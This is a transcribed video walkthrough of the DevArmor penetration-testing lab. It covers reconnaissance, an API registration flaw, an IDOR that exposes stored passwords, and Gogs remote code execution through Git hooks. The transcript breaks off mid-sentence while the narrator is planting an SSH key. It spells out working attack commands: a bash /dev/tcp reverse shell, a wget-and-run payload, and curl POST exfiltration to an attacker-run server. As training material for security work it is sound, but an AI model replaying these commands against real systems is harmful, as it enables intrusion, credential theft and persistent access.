Hello everyone, welcome to my YouTube channel. This is Arbitrary Security, and in today's video we will be walking through the DevArmor Lab and demonstrating how multiple vulnerabilities can be chained together to achieve full system compromise. We're going to start with reconnaissance and enumeration to identify exposed services and hidden functionality within the environment. Along the way, we also discover a vulnerable FortiLock instance, abuse hidden registration API, and exposed an insecure direct object reference or IDOR vulnerability to gain access to sensitive information and recover valid credentials. So using those credentials, we're going to pivot into an internal Gogs instance and leverage a known argument injection vulnerability to achieve remote code execution on the underlying host. So once we establish an initial foothold, we continue with our post-exploitation activity and then identify opportunities for privilege escalation. And finally, we're going to examine a vulnerable backup process that relies on unzip-stream version 0.3.1, which is affected by as a known CVE published back in 2024. So by exploiting this arbitrary file write vulnerability, we will be able to overwrite sensitive files and ultimately escalate our privilege to root. So overall, I would say this lab is a great example of how seemingly unrelated weaknesses can be chained together to create a complete attack path. So taking us from the initial access all the way to the full control of the target. So with that being said, let's jump into the walkthrough and get started. So I'm going to edit my file. Let's see, grab the testing IP address and then see if we can reach the server itself. So let's go and ping. Okay, so it's reachable. So let's go ahead and run our nmap scan. Before that, I'd like to create a directory for this, call this DevArmor, and then set it into DevArmor. And now let's make another directory for nmap scan. Nmap scans, and now we can run nmap --min rates. Let's put this for 10,000 -v for verbose, so we see the port as it discovers it, -p to scan all ports. That will be 1 to 65,535 ports, and then the IP address, and let's disable host discovery, and then let's output our scan into the nmap scan and call this DevArmor.log. Okay. So off the bat, we see two ports coming up at us here. We have HTTP and we have SSH ports. And let's just visit the page, see what we get back. And okay, so just the static secure, and we have to edit our host file. So let's go ahead and do that. And then we also see another port, which is I would say possibly this would be SSH port. Usually administrator might configure service to run on different ports. So it could be SSH, it could be another service set up to run on port 2222. So what we're going to do is have our nmap run full scan, script scan and version scan on this service. And we can do that by specifying SV for version scan, SC to perform script scanning, and then we can do V for verbose, P for the port. Let's focus on port 80 and 2222, and then let's put the IP address and run this. Also, let's go ahead and edit our host file. So let's do this. And we can for the IP address, and then DevArmor.lab. Now let's go back to browser and then refresh this page. It's probably going to take time for this to sync up. Alternatively, let's go to the static page again. HTTP. Okay, so let's see. We have the DevArmor securing the software pipeline. Can we search here, search anything? Is it gonna work? Let's see if it's making any network requests. Inspect. Let's go to network, and if we type anything, so is it making any post request? Keyword, okay, anything, and what's the response like? Let's close this one, and let's look at the response. So still returning the same home page, so nothing really interesting here. We can go ahead and close this one. So let's just do some click through, see what we can pick from this. And also, while we have this, while we're inspecting this, I think we should have something run in the background for us. Let's see, split view to make it easier, so remind me later. And I can close this one, that's fine. Let's go and check our nmap scan. So it finished the scan, and we see that this is SSH, like I said earlier on. So without our private key or without a valid credential, we might not be able to do anything really on this port. So I think the initial entry point will be the HTTP. So let's focus on that, and let's force the directory. So we can use let's use C to colorize our output for URL, and for word list, use a share word list, set list, discovery web content. I'm using tab for auto completion. So this time around, let's use large word. This is drafts large words .txt, and then let's specify the URL. So let's do HTTP DevArmor Lab, believe so, and then let's put the feed where we want to first. Also, let's check if this is a PHP page. So we can do index.php. So this is not serving PHP. This is informational finding. Sometimes could be low because it's returning server information disclosure here. So we have Apache 2.4.58, and it's telling us that this is Ubuntu. So we can possibly copy this and check for possible vulnerability for this version. So let's see. Let's go back again. And since this is not PHP, let's try HTML. Okay, so let's go back again and feed in the extension. Let's do .html. And also let's do .txt for any test file, .txt, and also .db for any database, and also conf for configuration file or config. So yeah, I think this might be good. Right, So let's go ahead and run this. I'm getting some 403 error, so let's go ahead and filter those. So we can filter by size, so that would be FS, and we can also filter, I mean for the code we can filter by code by specifying FC, I believe, and for size FS, for word that would be FW, and for line would be F10. So pretty much I'm more interested in filtering out anything that has to do with 403. So let's go ahead and run the same command and do FC 403, and that should hide all error that has 403. So what else do we want to focus on? Let's go back to the web page and start picking up on some of the things we can. So let's go have notes.io, and we can put here, let's just do findings, and then let's do another one, credentials if possible, and then let's do interesting information, and let's do that. So for the finding, we can just put server information disclosure here. So let's check for possible vulnerability for the versions, and what else we can. So we see that these there are some documentation of some findings. So we have HTTP response splitting, and with the CV we also have I believe this might also be vulnerable to HTTP smuggling attack. So we can take a look at this later. So the Apache server version prior to this, subject to various issues including the buffer overread vulnerability. So we can pretty much notate this, and if we hit any roadblock, so we definitely will go deeper into this, and that could be possible attack path. But for now, let's continue our information gathering, reconnaissance of the web application. So these are just anchor page, it's not taking us to anywhere. And scrolling down, what do we have? So we can also get the domain here, but right now we have email. So this is support@DevArmor Lab. So let's go ahead, put this here. Really interesting. So definitely we will be targeting this email. So what else we can get? Support page, and let's see the content form. Maybe we can submit something. Test for cross-site scripting here. Also, let's see script allowed success, and see this one. Okay, so we didn't get anything back. Let's check the content form. Let me reduce the speed a little bit. So we'd love to hear from you. Got a question, ready to secure your pipeline? Reach out to our team lead. So we know that we have the email of the team lead. So that would be interesting person of target. So we can highlight this and then just put our person of targets, or maybe high profile targets. profile target. And the reason is that the lead might have different permission than regular user. So we can just put this here, lead staff. So now we have to email. Of course, we only have the domain itself. I still don't know how this email is set up. Usually in organization, emails can be first name initial dot last name at the domain.com. It could be the first name, the last name at the domain.com, or first and middle initial dot the last name.com. So it's still kind of a little bit hard when it comes to this email. I do not fully understand what the naming schema could be for this email. So the reason why I'm saying this is if we're able to deduce how the email is set up, we can use email generator to generate a separate emails, have a different word list for first name, last name, and then use the tool to generate a possible username. And then along the way, if we come across default credentials, we can test that across the emails that we generated. But for now, these are just the two information, two useful possible informations we're able to piece together. So let's go back to our scan, see what we have. So far, nothing interesting. So what I like to do next is to perform virtual host forcing as well to brute force for subdomain, so we can use the same tool for let's see to colorize our output. This time around, use user share word list, sec list, discovery. I want to do DNS, subdomains, and I want to do top 11,000, and then specify the URL HTTP, and this will be DevArmor.lab, and then let's specify the host. So host header, so which would be the false DevArmor.lab, and that's pretty much it. So let's run this. We see a lot of information also coming at us here, and how can we filter? We can do the same. So we cannot filter by code because everything has a status code of 200 OK, but we can either filter by size, filter by word, or filter by line. So let's do filter by line and filter by 515. So let's do FL 515. So let's have those run in the background for us, and now let's go again and start poking around, see what information we can get. So HTTP2 memory leak, and this is an older Apache version been issued for newer exploit discovered over the last several years. See 2.4 vulnerabilities. So LDAP use. So these are the severity of the findings. So these are low, these are moderate or medium. These are low, proxy bypass, reverse cookie map, buffer overflow. So pretty much most of those findings, most of these findings are low, moderates. Yeah, so I can take a deeper look at this later on and see what we can do with the information. And also there might be a public exploit for this, exploit Apache HTTP server vulnerability, and this is the same version that we have, 2.4.58. so we can look at this. So I'm trying to see, let's close this one. Various issue including buffer override vulnerability, the same thing that we saw earlier. Denials of service, we don't want to do this. Memory allocation issue in HTTP2 stream, and pretty much we have exploit code for this. Connection to perform a DOS attack, so we don't want to run this, and that's the reason why you just don't want to blindly run the code against a target without you understanding what the code is doing. A real penetration tester or security person wouldn't want to cause the client system to go offline, because that would definitely be breached of the CIA, because the CIA, we have the confidentiality, integrity, and availability. So the moment one of those get compromised, you have literally defiled the purpose of security. So making sure the system is available to intended users, and also uphold the confidentiality and integrity of it all. So we rarely perform a DOS attack unless we're performing a stress testing for clients, and it's fully duly authorized to perform a DOS attack to see how the system can withhold in the event they have actual attack. But in the real sense, we literally go off performing DOS attack. So let's go back and see what information we have. So we see the subdomains that come up, VOD. So we can also now include this into our testing pipeline here. So let's do host and then add this new vort.devarmor.lab, and now let's go back again and run the same fuzzing and see what we can get as well. Okay, so let's do fuzz c what list, user share what list, set list, discovery web content, drafts. Let's do medium words .txt, and specify the URL. This time around the URL would be vort.devarmor.lab, and we want to fuzz here, and let's do -e.db, and let's do .txt, and also filter by code. Let's filter 403. So we see login, we see add view. So let's go and look into that as well. Let's see, HTTP. I like to get my pop run. Even though I'm not intercepting the request, I can come back and click through what the Bob actually captures during each of the requests. And then let me go ahead and turn this on. And now let's go to let's do HTTP vort.devarmor.lab, and let's go ahead and let me see, prosy, my bob should be 8080, and let me go ahead and save this, close this, and let's refresh. There we go. So we get the FortiLock, and was I able to capture anything here? Nope. So let's set up my prosy. It's set up. Let's go back again, and did I turn it off? let me turn it back on. And now if I go back to Bob, let me turn this off, go back here, refresh, we should be able to see the traffic in Bob. If I go to my HTTP history, there we go. So we have the login page. We can also notate this as well. This is another server information disclosure here. So we definitely have to be suppressing the server information because it might give attacker way to enumerate the server, check which underlying stack the server is running, or possibly search for public exploits against the running server. So let's include this into our findings, and we can just put affected URL, or maybe affected endpoint or affected host. So let's do affected endpoint. And this would be for vort.devarmor.lab. And for here, this would just be for devarmor.lab. Let's go back again. So FortiLock, let's try default username. Let's do admin. Invalid credential. Let's see. Let's do admin and FortiLock. And invalid credential. So what else? Let's try administrator, and let's leave it as FortiLock. We have invalid credential, and let's try roots and roots. Invalid credential. How about FortiLock? So we're getting invalid credential. So what I'm trying to do here is test for default credential, see if we're able to get in, and also see if this error message is going to change, because you can possibly enumerate for valid user if you get different error message. For example, if we put a valid username and we put incorrect password, we get a different error message, and if we put in wrong username and we get a different error message as well, it will be possible for us to enumerate valid user email or valid user. But right now we are unable to enumerate for any of those because we're getting a generic error message, invalid credentials. So we don't know which one is invalid. Could it be the username or could it be the password? And which is actually good practice here, because you have to provide a generic error message. That would make it a little bit difficult for the attacker to enumerate valid user. So right now we don't know what FortiLock is. Let's go and search Google. Google's our best friend during any of our engagement, and because I have Bob Suit on, I haven't imported the certificate. So let me just go ahead and turn this off, and you can just go to Google again and search this, see if we have default username and password. So it says the administrator credential for main Fortinet. I don't think this is not a Fortinet. So and security device often confused with FortiLock. Okay. So we have admin, and we can try admin with no password, and then we can also try admin and use maybe 1 2 3 4 5 6 1 2 3 4 5. Let's try that. Admin, leave the password blank, it's compulsory for us to fill this, so let's do 1 2 3 4 5 6. So I really don't want to lock out this account if indeed there is admin account, because we've tried more than 3 times now. So let's try another user not exist, and let's test for, or let's do this, administrator, or 1 equals 1. I want to test for SQL injection here, see if we can log in. So at best, unfortunately, we cannot. So let's go back, see what a scan result gives. Oh, interesting. So we see that most of the logins that we actually performing is making API calls. Definitely we have API endpoints to enumerate. So what I will do is possibly just send this to repeater, right? So if we have a login, oh, another thing we failed to test is the password reset functionality. So we can also try to click this one. So it's not taking us anywhere. So what I would have loved to do is click on forget password, and then if it's asking for username, if I put the username and then I get user does not exist or user not found, and then I put maybe another different username, and then it says a password instruction has been sent to your email, then we could definitely enumerate valid username with that technique as well, because we get in different message that tells us if a user exists or not. But in this case we cannot, because this functionality is not working. So let's go back and see what we have with our scan. This is done, and since we have API endpoint, let's go ahead and force the API endpoint as well. So let's go API and then send this. And let's go back to Bob Suits, see what we can do with this one. So making a post request. So if we have a login request, if we have a login, and can we post to password reset? I don't know if that endpoint is available. So let's do password reset, and let's send empty request, see how it behaves. So we get the URL was not found on the server. So how about, oh, I put password rest, should be password reset. Okay, and should we do reset password, reset password, and we get nothing. So that doesn't work, and we do not have a way to register for user. So let's try something crazy here. My thought process is telling me to test if we can hit register endpoint and send the request. Good. So now we have different error message. So it says we are missing required field, so we have to post username and password as well as the email address. So let's go ahead and do this. And here let's do accuracy, and then for the password let's do security $, and the email address let's do accuracy at DevArmor.lab. So we have that. So if we send this over, we get user created successfully. So if we forward another login page to here, let's go here and test the credential that we just created. So let's do accuracy, and then here we can do security $, and we send this, and here we go. So we have kind of the message that the login was successful, and we seen some JWT token, and we have our unique user identifier here. So let's copy this, might be useful later on. Let's go back here and let's do this. This will be for Acronis, and then let's go back. Now let's log in properly to the network. So we can do Acronis, and we do security $, and let's click on login, and here we go. We're able to successfully log in the system. So what exactly is FortiLock? So FortiLock is a secure password management solution developed by DevArmor, designed exclusively for use by DevArmor employee, as it provides a robust platform for them to store, manage, and share passwords securely within the organization, and ensuring that sensitive credentials are protected within industry standard encryption and access controls. So some of the key features is the view password, where you access your stored credentials in a secure and organized way, so you can view, copy, or delete. So pretty much more of like a key vault, what key vault would do. And also you can add a password, you can share password with other employees, and then you can delete the password. Also you have a section for the employee only, so these are not clickable, so it's just hover your mouse through it. And let's look at this view password. So let me go ahead and intercept all of this request. Love to get a glimpse of what's going on in the background. So if there's any interesting request, I send it to repeater, and then I can take a closer look at that. So let's intercept, go back, and let's view password. And did I actually? So let's click on the password again. So we send in a get request. So this is not hitting the API yet. So the next request is going to the API, so which we have the API, the password, and then the UUID. So let's go ahead and compare this UUID with what we have when we signed in. So that way, if this is the same, then if we're able to get another user UUID, we can just literally interact with the same endpoint and replace this UUID to get password. So that will become IDOR vulnerability. But in this case, let's see what we have. So if we go here and let me paste it, and pretty much is the same. So now we know the interesting action we have to perform if we come across a way to enumerate another user with their UUID. So I send this request to repeater so I can take a look at that again. So we can also get the user API. So if we send this, right, and how about if I don't specify my UUID? Can I get UUID of others? So it says, and how about we delete this? Let's just get API user, and we have users. Okay, yep. So we have users, but then it's requiring, it's asking for email. So how about we do email, and let's do a request at DevArmor Lab. Can we do that? And here we go. So we have UUID. So that way we can change this. We notice we come across two separate email address. So let's try for support. And user not found. So we find a way now to enumerate a user, a valid user. So user enumeration is allowed here. So what we can do is possibly copy this into a test file, and then we can force this, or maybe send this to intruder, right? So if you send it to intruder, this particular field is what we want to force, so we can just add this and then specify the word list that we want to force, and we can filter based off the response that we get. For users that are not valid, we get user not found, and for those that are valid, we get the UUID. So the way I would have done this, because I'm using Bob Suit community, it's a little bit slower when you're performing intruding. So I would definitely would have copied this into a separate folder, either write a script to force this, or use the same forv that we use to force this directory. So what I will do is, let me go back to repeater. So I will change this, right? I will change this to false. I will change this to false, and then copy the all request, and then this one is done. So we can just do this via users brutes, right? So, and I'll just paste this. So this is where we want to brute force, and then we can write quit. So then we know that we can use forv -c to colorize our output, -w to specify the word list. So user share word list, set list, say username. Yep. So we can do either names, and what do we want to do? Let's do names.txt, and names.txt. What else do we want? And let's see, believe is -- request. Let's try that -- let's change this. So let's move users to user brutes .rec. So now -- request, I will see user brute, and then request proto, and this will be HTTP. Is it -request or -request? Let's try this one first. If not, then we'll put -request. So exit, and if we send this, now we see that we actually forcing this directory, and we're not getting anything back yet. So this is the alternative route I would go if I'm to force this without using Bob Suit. So let's go back and continue our enumeration. So since we have a valid way to test for users now, and here we go. So we see that the user register endpoint is not literally allowed, because 405 is not authorized. So, but this is another findings we can report, because if we're not authorized to make this request, then unless the request method is what is not authorized. So I don't know if this is intended for end users to be able to interact directly with the API endpoint to register an account, but this is what reporting to the client. So because we're able to interact with the API to register for user, it should be part of the report as well. So let's go back to our Bob Suits, and we have user not found. Which other user do we have? Let's see, go back to our notes, and we see Aryee. Okay, go back and try Aryee, and there we go. So we can take a screenshot of this. right? And make sure we blur this user ID, blur the user email as well, because you don't know who might be getting the report. But this is what copying into our notes for analysis. And let's also check for admin if that user exists. Admin, send this over. A user not found. How about administrator? Administrator. Let's see. And user not found. So let's go back and save this to our notes. So this is interesting. So now we have the UID for this particular user. And now that we have the UID, we notice some other interesting API call for password. So let's go to our history, HTTP history. So get API passwords. If we send this to repeater, if we send this get password, so we're not getting any password. And this is because we've not stored any password. So let's go ahead and try that first, see if that is viable path to take. Let's go ahead and turn this off. Let's add password. Actually, let's add for YouTube, and let's do username accuracy. And we have, let me turn this on, but I do not want to intercept this request, so that way we can see what's going on. So we have most of the endpoint, we have pretty much most of the calls that are being made right now. So let's go ahead forward this request, and let's go back here. No, I do not want to intercept, so let me turn this off. Okay, so let's go back and we can do security 1 2 3 4. Let's add this. Oh, it's the website, not the name. So http youtube.com, and let's add a password added successfully. Let's also add http, let's do DevArmor Lab, and then we can do accuracy, and then we can do security $, and add this, right? So for the received password, we have not received any password yet. So if we want to share password, how does this work? So we put the email address. So let's see, maybe this is what we actually discovered earlier on. Let's go ahead and intercept this particular request, see if this is what led to us getting that user, because this is the validator here. You check if a user exists or not before you actually share your password with them. So if we do accuracy DevArmor Lab, and we check, here we go. So we see this is the same request that happened earlier. So it's making the get request to this endpoint, and if the users exist, then you get a message that says the user it says failed to verify email. Okay, yeah, here we go. So because I made a typo here, it's missing her. And then if we check again and forward this and go back, we see it says user with email accuracy exists. So now we can take a screenshot of this, put it in our note. And also for user that does not exist, we can take a screenshot of that, put it in our note for proof of concept for us being able to enumerate valid user. But in this case, we have two passwords that we want to share.
But for this particular thing, we can put, let's say we want to search for the lead. This is the email of the lead. We check this forward and go back here. You see the user actually exists, and we can select which of the password we want to share. So if we share this password, this is another way we can also get the user UID or UID. So we have the recipient. So this will be for the lead staff, and this will be for our current use case. So we can copy this. Believe we already copied it. So we copy this, and when we forward this request, we know that we've shared the password with them. So in this case now, if we go back, get our password API. So if we send this is for our password, right? So this is what we created and stored in our repo that we shared with other user. But how about if we just change this to the other user UID that we identified earlier? That will confirm IDOR vulnerability, because we're able to access their information without logging in as that user's information. So if we send this, and here we go, so we have this information. So we have to blur this in our report, and also blur every sensitive information when it comes to your report writing. But then we can notate this as a valid credential for us. And then we also discover another URL, another subdomain, Gogs, and mail that we can interact with. So let's quickly add those to the list of credentials that we have. So now the first credential would be this, right? And this would be for gogs.devarmor.lab. And then the other one, it's this for mail, but we do not see any mail server running on the system. So that's good. So let's go back here, and we can put this E, and this would be for mail.devarmor.lab. So now we can go back to here and also modify our host file, and now we can add mail.devarmor.lab and also gogs.devarmor.lab. Okay, so now let's go back and see if we can interact with those two newly discovered URL. So still go and turn off my Bob suit here. I do not want to intercept, so that it can passively grab those information as we go. So let's do http mail.dev.lab. So this is the same thing we saw earlier on. Let's see, where's this taking us to? Okay, so it's taking us to DevArmor.lab. Contact form. So there's nothing different than what we had already saw earlier. So let's check the other one. So which would be http gogs.devarmor.lab. And here we go. So we have this, and let's try to sign in, or let's see if we can exploit a project without signing in first. See if there's any sensitive information. We see we can enumerate the user here as well. I mean, we can discover the user here. Let's see, for this user, how about we put support? Let's go ahead and turn this off. Okay, so about if we put, let's change this to support for not found. We currently do not have any project, but how about we put Alcaraz? Okay, not found. And if we put delete, we have this. So let's try login and see what we have. So we have this as the email, and let's see what's the password. There's the password that we copied. Make sure we copy the exact same password. So let's go back and click on sign in. So let's exploit the project, see if there's any project this user published. There's no projects. So what else can we do here? Profile. We already saw the profile. And this is a joined May 27. So it's quite recent. So let's see your settings. So we have this. We have this. This is SSH key. This is a list of SSH keys associated with your account, as this account allows anyone using them to gain access to your repo. So probably have to add a public key here and see if we can SSH in, and repo organization, application, delete account. We don't want to delete that. So let's see, admin panel, because this is a privileged user. So what can we get from here? So we have the application is running version 0.13.0 and the Git version 2.43.0 as well. Let's see, we can search for this. Let's do google.com. Like I said, Google is our best friend, so let's utilize this Google and check Gogs 0.13.0, and what do we have? Okay, let's see. So we see that the version is impacted by several vulnerability that allows authenticated attacker, right, to gain access, to gain a remote code execution, and also compromise the server host itself. So we have a couple findings here that definitely can lead to this full system compromise. We have argument injection vulnerability, and also we have path transversal that leads to the remote code execution. So a symbolic link path transversal flaw allows the attacker to push to the repo and also kind of create a symbolic link to this. So we also have a public one from ExploitDB. So let's open this one, and also interested in this one. Let's see. See, how do we go about this? So the Git service is vulnerable to symbolic link path transversal that enables remote code execution, and the latest version, as of the time this was written, right, the vulnerability is exploitable against default install, with only attacker requirement being access to the account that can push to repo and edit that repo. So we have the ability to push right to the repo as well, because we have control of this user and the user is also admin, right? So we can definitely edit and push to the repo as well. So let's see if there's a proof of concept. So it says, with the primitive in hand, we can achieve code execution by taking advantage of the server-side Git hooks. So these are scripts that lives in the repo. So the hooks directory, and I think the most important part of it is the action, right, when you push. So the pre-receive, and also I think we have the pre-receive, the post as well, and let's see, so you overwrite its content with the command of your choice, then the hook and our command will then automatically execute without any extra work done. So let's try and get the POC here. So let's do raw. So let's go back here. Let me open another terminal and let's see, make the R POC, so the POC and exploit.py, and we can put this one here. So how do we run this? So Python 3 exploit.py. It says it's not enough value to unpack. Not enough value to unpack. So let's see how we run this. Let's do less exploit.py. Yeah, so the usage, we run the exploit.py, the URL, the username and the password, and that's it. So the code itself is gonna take its course. So what it's gonna do is create a project under the user and then push it. Let's see, to make sure the code is not doing something crazy. So you had the commit push, and then you also edit, and yeah, so the code is clean to me. So let's go. So we just run the URL, which will be dev nope, let's do gogs.devarmor.lab, and the username will be this, and the password, do we have password in the dashboard? No, I pasted the wrong thing. Let's go ahead again. Python 3 exploit.py, and we want to specify the URL let's do gogs.devarmor.lab, and the username and the password. Let's go grab the password really quick. We have the password here, and we'll run this. Interesting. So let's see, let's view the code again. Let's put the code. Okay, let's go ahead and enable our pop suits, and let's run the code again. Why is it not working? Is it We have the username, we have the password. Let me see. Websites. It's enabled, right? Okay. I'm trying to see here. Let's see what we can do. All right. Let's go back. We can also try the other exploit code. One second, let me try this again. We can as well try the one from exploit.db. Let's see, probably have to investigate that and see why it's not working. Right, so let's go back again. Exploits try. I mean to edit the file exploit.py exploit.py and so let's see. Let's see if we can ping system first. I'm trying to see what else is missing here. So, oh, I see. So I think the previous command was not enabling the proxy. So if we go back to the code itself, let's see, where's the one that we copied? Was it this one? So this was actually commented out, so we just removed this. I think that's just what I did. That's the only thing I did, and then I tried to change this right to first ping my system, see if it can actually talk to my system. And let's try this first, see if this is gonna work. If not, we try another POC. Let's run this, and there we go. So it got sent to our Bob, and then we forward the request. So we send this, creating the repo, create the repo, send this, get this, and there we go. So it already pushed to the server itself. So what we have to do now at this point is let's do TCP dump. I want to check if I'm getting a response, and let's go back here. Let's see, Gogs, and if we go to the dashboard, we see that it already pushed to the and we have the repo, right? So it created the symbolic link here. So this is the same link. So what we have to do now is click on this project, then we can edit this, but what I want to do is try to modify the pre. the pre-received script, so which is what will get executed when we push or make a new commit. So let's go and just do ping, let's see, for and let's do http. Nope, and I have to get my IP address. So let's see, and I have to do that. So let's do, this should be 192.168.45 and 213. So I want to ping it 4 times, and if I do hook and then go back to the project itself, and if we try to modify this one and click on edit, just want to change this one, right, to pre-received. I'm not making any other changes, just making the commits change. So if we do the commit change, we should get a ping back here. So let's go make that commit change, and if we go, here we go. So we see that our code, our command executed successfully. So we're getting a ping from the DevArmor to our system. So now that we're able to confirm that, let's just go ahead and get a reverse shell. So we can do nc-lvmp 444 is less than quad 4. And if we go back again, we have to do the settings, and then we have to modify the hook again. And this time around, let's change these to -i, and this will be dev TCP. My IP address 192.168.45.213, and we're listening on quad 4, and then pretty much that should be it. So this should allow us to get the code. So if we copy this, right, if we just copy this and go to the terminal and split this, so to make sure we have the code functioning, the command functioning correctly, if we do this, there we go. So it's not right, dev TCP search file directory. Okay, let's do -c, my muscle member here, -i, and dev TCP 192.168.45.213. All right, and what am I doing? Oh, I missed the port 444. And here we go. So we get the shell here. So this is the working code that we definitely have to do. So if I do this, I get this cleared up. So let's just go here, copy this one. That's the reason why most of the time I like to try things on my local machine before I run it on the server to make sure it's functioning properly. So let's do our listener port again, go back to modify this. So let's change this one here, and we can put this one, update the hook, and we can go back and let's modify this one. Since we already started working with this, we can change this one to receiver, just name it anything. So any changes, just one and make the fresh commit and see and we do see that it hang, and we should get a command. Why are we not getting this? Okay, so let's see. Another thing we can do is pretty much go to ref shell, or we can do the shell.sh, and I want to do bin batch, and then use bash -i. Nope, I want to do the dev tcp 192.168.45.213. I'm listening on quad 4, and let's see if this is also gonna work. So if I do bash shell, and it indeed actually works. So what I have to do now is pretty much run my Python server, HTTP. Let's listen on port 80. Okay, so let's also listen on SMP 9004. Let's go back again and make commit, see what's gonna happen. There's the hang. So let's make another change to this. Let's change this one to wget http 192.168.45.213, and let's get shell.sh, right? And then I want to output this into, let's do dev shm and call this shell.sh, right? So the other one we want to do is, let's do bash, let's do dev shm and call this, or let's do this. This should actually work without using chmod x, and let's do dev shm and call this shell.sh, and finally let's call the script bash dev shm as shell.sh, and hopefully that should communicate with us out to our server, pull the shell.sh, then output it, save it in the dev shm on the server, and then we giving it executable permission, and we run bash to get a reverse shell. If that doesn't work, what I will try to do is let's see, let's try this first. Hopefully it's gonna work. Hopefully it's gonna work. So let's edit this and change this one to ty, and just do commits, and the commit that we do, it indeed actually get the shell.sh, but we're still not getting a reverse shell, and that's crazy. Okay, so I want to do something else, right? So we still leave the shell.sh, right? So let's go back to the server. I want to do let's see, I want to do this. Let's do cancel, and then let's go back to our settings. Let's go back to our settings, and I have to do this. So let's leave it at this. So what I want to do is echo, or let's say what my, or let's run ls-lh, and then pipe this to crawl. Nice. Yes, let's do posts, right? And we want to do HTTP, and we want to do 192.168.45.1213, right? And then I want to make this shell, and what else? I need to specify the header, so I want to do content type. Here I want to do text dot plain, and then dash data binary, and let's do this. If that should let me see, make sure we have crawl, so we have the post, and that should be it. Let me see. Let's try this. If this doesn't work, we'll try something else. But what I'm trying to do is to list the content of the ls and then pipe it to crawl, so that way the result of this is going to be visible to us when it make a request to our server. So in a nutshell, same way we get this request of getting shell. So if it's making a post request, it's posting to our HTTP server, and then once it makes that post request, we'll be able to see the output of this, and then we can take it up from there. So let's go ahead and try this. Hopefully it's gonna work. Let's go back, save this. Let me save, and then go back here, change this one, raw edits, and let's call this serve, and let's do the commits, and let's go back here. So we notice that it got the first shell request, and then the other one is we're getting the code 501 message unsupported method post. So because we're using Python module, it doesn't support a post request. So what can we do? Let me see. Let's see if we can create a server request here. So let's see. Let's make the error. Let's call this touch server.py. Right. So we have server.py. So what we have to do, let me use code and call this out. Let me continue without GitHub. I don't want to authenticate right now, so just get started. Yes, I trust the author, and I can leave it to do its thing. So what I want to do now is I don't know if I can zoom this out a little bit. Yep, so this should work. So I want to import this main yes, quit. So let's do this Python 3, and I want from http.server. I need it to import based HTTP handler and also HTTP server. There we go. So class handler, and let's do base HTTP request handler, and let's define the function. So let's do dev2 post request, do post and self, and let's do length would be just self dot headers. I want to do that dot get, right, and also want to get the content length, content length, and that would be 0, right? So, and let's do the body, also will be self read file dot read and length, and hopefully I'm not going to get an error message. So let's do print let's do posts received from Gogs server, and that should be that. And also I want you to print the path. This is going to be useful, and I will tell you why in a bit. And let's do path. I want you to do this self the path, and let's see what else are we missing. So I wanted to print the body, and then I needed to decode that. Errors should be ignored. Yeah, and then I needed to send response response 200, and also save end headers and save dot write file dot write, I would say, and that should be it, and and let's do http dot server, and want to do, let's listen on all interfaces. So let's do this. But if you want to listen on a specific IP address, just specify that. But for now, just want to open all interfaces. Let's listen on port 80, and then we do handler, and then I want it to serve forever, right? So not just receive that and close the connection. So I want to serve this forever. And if we save this now, so let me minimize this just in case I screw up with the code, but everything looks clean to me here. We can we already have our Python server run. We just have to run Python 3 server.py that we just have, and let's see. Is it working? Let's see. Yeah, that's why. So, and if we save this, let's go back. I know I screwed something up. So if we run this again, that should, here we go. So now we see that our server is running, and if we go back and make that same request, let's go back and make that same request. We can just edit this, and we just remove this one and make commit. If we go back, we see that we still get the same message, but this time around, recall that previously the get was supported, but because we have our stand-up server to undo post request, now the get request is not being supported any longer, but we getting a response from the server itself. So we see that we're listing the content of what's on the server. So currently in my working directory, this is what I have. So if I do ls-lh, so we have this is what I have on my local machine. But on the server, we see the config file, the custom hook, the object. So now since we now get things back from the server, this is what I want to do. I want to make some multiple requests, so that way we can enumerate the system from there, or possibly write a command, right? Run a command that would generate SSH key, and then put the SSH key in the directory, and from there we can pull the private key and SSH in as well. So let me clean this up and start a fresh server. So now let's go back to our hosts. So if I do settings, let's do git hook, and so since the first one is working, we already know the content of this. So let's start off by saying what mine, right? So then this is the part that I said I was going to explain later. So this part will let us know what we initially requested here. So if I put this display UMI, display UMI, and we want that, and what else do we want? Okay, so let's do another one that will give us the current working directory. So let's do print current working directory. So here we change the command to pwd, right? So that's that one, and also did I mess up something? If tests, yeah, I think so. Yeah, so we have the current working directory. So what else do we want? Let's change this to, let's also view the content of dev-shm, view dev-shm. Let's see if we have the code, that the shell that we pull. So let's do ls-lh dev-shm, and also let's check the SSH directory. If there is existing SSH, we can just retrieve the private key, but we currently do not know which or whose user we're running as right now, so it will be difficult to actually see our current privilege. And let's also check the content of ls-leh, and let's do opt directory, and then pipe this into this one, and that should be it. So this would be view opt directory, yep, and that should be it. Okay, so let's save this, and then let's go back and let's edit this one. So we can edit this, edit, and change this to anything else, just add another value and make commits. And if we go back, we see that we get a lot of requests. So this, the path that I said earlier on when we were writing our Python server, is to actually tell us exactly what we try to run. So we say, oh, okay, display the who am I, and we get the response here to make it clean, right? And also here we requested to print the current working directory. So now we know that we are currently in OPT, Gogs, and Gogs repo, and the current user and the Git instance. And the other one is to view the dev-shm, so which of course we saw that the shell.sh was pulled successfully from our initial from our local system initially, and it does have executable permission, but for some reason, see, there's nothing in it that get executed because the file itself is 0 bytes. So, and viewing the opt directory, we have DevArmor Backup Manager, we have FortiLock Vault, and then we have Gogs. So we can manually enumerate this, but instead of us to be going back and forth like this, it's better off to look for a way to, you know, get git SSH key, and we can SSH in, and we can properly enumerate this system. So let's go back and see what we can do. Let's see. So let's go back here and settings. So we can go to GitHub, and let me change these to first. I needed to display what we have in the SSH directory, ls-leh, and go to home, go to git, and then go to the SSH. I want to see what is inside here, and display git SSH home, and then I need you to run SSH keygen, and type, I need it to be RSA, then B4960, and then the shelf, I need to have it in home git.ssh id underscore RSA, and do not need this, and quiet. So that way it's not going to prompt, right, for while generating the SSH key. So all I'm just doing is the type that I want to generate, and also where I wanted to store it, and then no passphrase, and just run it quietly. And after that, I want to make sure that this is generated successfully. So let's do generate SSH key. Gen SSH key. And also I want to change this to display what we have initially in the authorized key before we make that changes. So let's do this authorized underscore keys. So here we also put this to view authorized keys, view auth keys. What am I doing here? Oh, view. This would be SSH key gen. So the second one would be view auth key, right? And yeah, view authorized keys. And now what I want to do is cat this and this dot pub, which is the public key, right? I want to append it because I do not want to, if I do single redirection, it's going to override what we have or what currently exists within the authorized key. So just want to make sure I don't override that. I just want to append the new authorized key. So I can do authorized underscore keys. No, I have to specify the full path, right? So I need you to save this in the home git SSH authorized keys, and I need to run cat. Yeah, so I need to run this. So cat home git SSH ID RSA dot pub, put it in the authorized keys, and this and pub in auth keys. So let's then 